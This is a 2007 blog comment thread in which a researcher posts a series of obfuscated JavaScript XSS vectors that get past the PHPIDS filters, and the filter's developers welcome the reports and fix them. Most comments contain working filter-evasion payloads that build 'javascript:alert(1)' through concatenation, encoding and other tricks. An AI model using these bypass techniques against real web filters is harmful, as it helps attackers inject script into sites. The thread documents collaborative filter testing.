The Spanner

Comments 21

1. Gareth Heyes wrote:

   I’ve found another serious one. I’ll share when it’s fixed. Here’s the other one I did which has now been fixed:-

   s1=0?”:’i';s2=0?”:’fr’;s3=0?”:’ame’;i1=s1+s2+s3;s1=0?”:’jav’;s2=
   0?”:’ascr’;s3=0?”:’ipt’;s4=0?”:’:';s5=0?”:’ale’;s6=0?”:’rt’;s7=
   0?”:’(1)’;i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa
   rentNode;x.appendChild(i);

   Posted 04 Sep 2007 at 12:30 pm ¶
2. .mario wrote:

   Hi!

   Great work again - thx a lot! It led me to refactor the converter unit of the PHPIDS and I think I have found a pretty stable beta of the regex to check and de-assemble concatenations.

   I am very looking forward for the 0.4.0 release we are currently working on - the help of you guys is what helps improving it eminently.

   Greetz,
   .mario

   Posted 04 Sep 2007 at 2:57 pm ¶
3. Gareth Heyes wrote:

   This is also fixed now:-
   s1=”+’java’+”+’scr’+”;s2=”+’ipt’+':’+'ale’+”;s3=”+’rt’+”+’(1)’+”;
   u1=s1+s2+s3;URL=u1

   Posted 04 Sep 2007 at 2:58 pm ¶
4. Gareth Heyes wrote:

   Good work Mario/PHPIDS team, I really admire all your efforts on this because I know how difficult it is to protect against this stuff.

   I’ll look forward to hacking it again though

   Posted 04 Sep 2007 at 3:01 pm ¶
5. .mario wrote:

   always appreciated!

   Posted 04 Sep 2007 at 3:46 pm ¶
6. Ronald wrote:

   It almost looks like ASCII art, good job!

   Posted 04 Sep 2007 at 11:28 pm ¶
7. Gareth Heyes wrote:

   Hehe thanks

   I might try again soon cause I love a interesting challenge

   Posted 05 Sep 2007 at 12:28 am ¶
8. Gareth Heyes wrote:

   Found another one (IE only):-
   I’ve had to base64 encode it because it causes conversation errors:-
   czE9IScnJiYnamF2JztzMj0hJycmJidhc2NyaXB0JztzMz0hJycmJic6JztzND0hJycmJidhbGVy
   JztzNT0hJycmJid0JztzNj0hJycmJicoMSknO3M3PXMxK3MyK3MzK3M0K3M1K3M2O1VSTD1zNzs=

   Posted 05 Sep 2007 at 4:50 am ¶
9. Gareth Heyes wrote:

   and another:-
   s1=”+”jav”+”;s2=”+”ascri”+”;s3=”+”pt”+”;s4=”==”?’:':0;s5=”+”aler”+”;s6=”+”t”+”;s7=”==”?’(1)’:0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8

   Posted 06 Sep 2007 at 9:04 am ¶
10. Ronald wrote:

    for(i=0;i<Number.MAX_VALUE;++i) { i+i; }

    Posted 07 Sep 2007 at 3:08 pm ¶
11. Gareth Heyes wrote:

    Check this one out, creates javascript: and passes it to the URL property, only works in IE though.

    s3=1==true&&':';s2=1==true&&'(1)';s1=1==true&&'javascript'+s3+'aler'+'t'+s2;URL=s1

    Posted 08 Sep 2007 at 10:25 am ¶
12. Gareth Heyes wrote:

    Here’s my favorite:-

    x=(this);c=1==1&&':';s=''+/javascriptaaalerta(1)ahrefa/|>+'';j=s[1]+s[2]+s[3]+s[4]+s[5]
    +s[6]+s[7]+s[8]+s[9]+s[10]+c+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j

    Posted 08 Sep 2007 at 6:43 pm ¶
13. Ronald wrote:

    Yeah I think this will be an endless armsrace

    btw do you know the Javascript functions:

    import() and export() ? It’s pretty cool cause you can export singed script data if import is called inside a signed script. I didn’t know this, there is a lot more to be learned in Javascript.

    Posted 08 Sep 2007 at 10:45 pm ¶
14. Gareth Heyes wrote:

    Nope didn’t know that but sounds cool, I’m gonna google it.

    Posted 09 Sep 2007 at 9:03 am ¶
15. Gareth Heyes wrote:

    c4=1==1&&'(1)';c3=1==1&&'aler';
    c2=1==1&&':';c1=1==1&&'javascript';
    a=c1+c2+c3+'t'+c4;(URL=a);

    Posted 09 Sep 2007 at 6:31 pm ¶
16. Gareth Heyes wrote:

    Definitely an arms race, I just can’t see how they can prevent all of it because we can always come up with new ways of doing things.

    Still I’m impressed with their filters it isn’t that easy to come up with new vectors and I’ve done loads of complicated ones which don’t get through.

    Posted 09 Sep 2007 at 6:42 pm ¶
17. Ronald wrote:

    I meant:

    import function() or var

    export function() or var

    Like:

    function a() {

    //foo

    }

    export a;

    misleading stuff I know

    Posted 09 Sep 2007 at 9:05 pm ¶
18. Gareth Heyes wrote:

    Found any docs on that? I would be interested to read, I tried Mozilla but there’s not much stuff on it.

    Posted 09 Sep 2007 at 9:42 pm ¶
19. Ronald wrote:

    It is here:

    http://devedge-temp.mozilla.org/library/manuals/2000/javascript/1.3/guide/sec.html

    Be amazed what the ‘ol netscape can learn us, it’s almost forbidden knowledge. I read the whole book over the weekend, learned tons of new and old stuff.

    

    Posted 10 Sep 2007 at 1:50 am ¶
20. Gareth Heyes wrote:

    This one’s awesome
    _=alert,1,1,_(1);

    Posted 11 Sep 2007 at 10:09 am ¶
21. Gareth Heyes wrote:

    This one took ages cause it’s really tough now with their new filters:-

    s=function test2() {return ‘hrefjavascriptalert(1)a’;1,1}();
    void(a = {} );
    void(c = URL );
    a.c=function xyz() {return c[4] }();
    a.h1=function xyz() {return s[0] }();
    a.h2=function xyz() {return s[1] }();
    a.h3=function xyz() {return s[2] }();
    a.h4=function xyz() {return s[3] }();
    a.u1=function xyz() {return s[4] }();
    a.u2=function xyz() {return s[5] }();
    a.u3=function xyz() {return s[6] }();
    a.u4=function xyz() {return s[7] }();
    a.u5=function xyz() {return s[8] }();
    a.u6=function xyz() {return s[9] }();
    a.u7=function xyz() {return s[10] }();
    a.u8=function xyz() {return s[11] }();
    a.u9=function xyz() {return s[12] }();
    a.u10=function xyz() {return s[13] }();
    a.u11=function xyz() {return s[14] }();
    a.u12=function xyz() {return s[15] }();
    a.u13=function xyz() {return s[16] }();
    a.u14=function xyz() {return s[17] }();
    a.u15=function xyz() {return s[18] }();
    a.u16=function xyz() {return s[19] }();
    a.u17=function xyz() {return s[20] }();
    a.u18=function xyz() {return s[21] }();
    $_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 + a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();
    for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;

    Posted 18 Sep 2007 at 1:34 am ¶

Post a Comment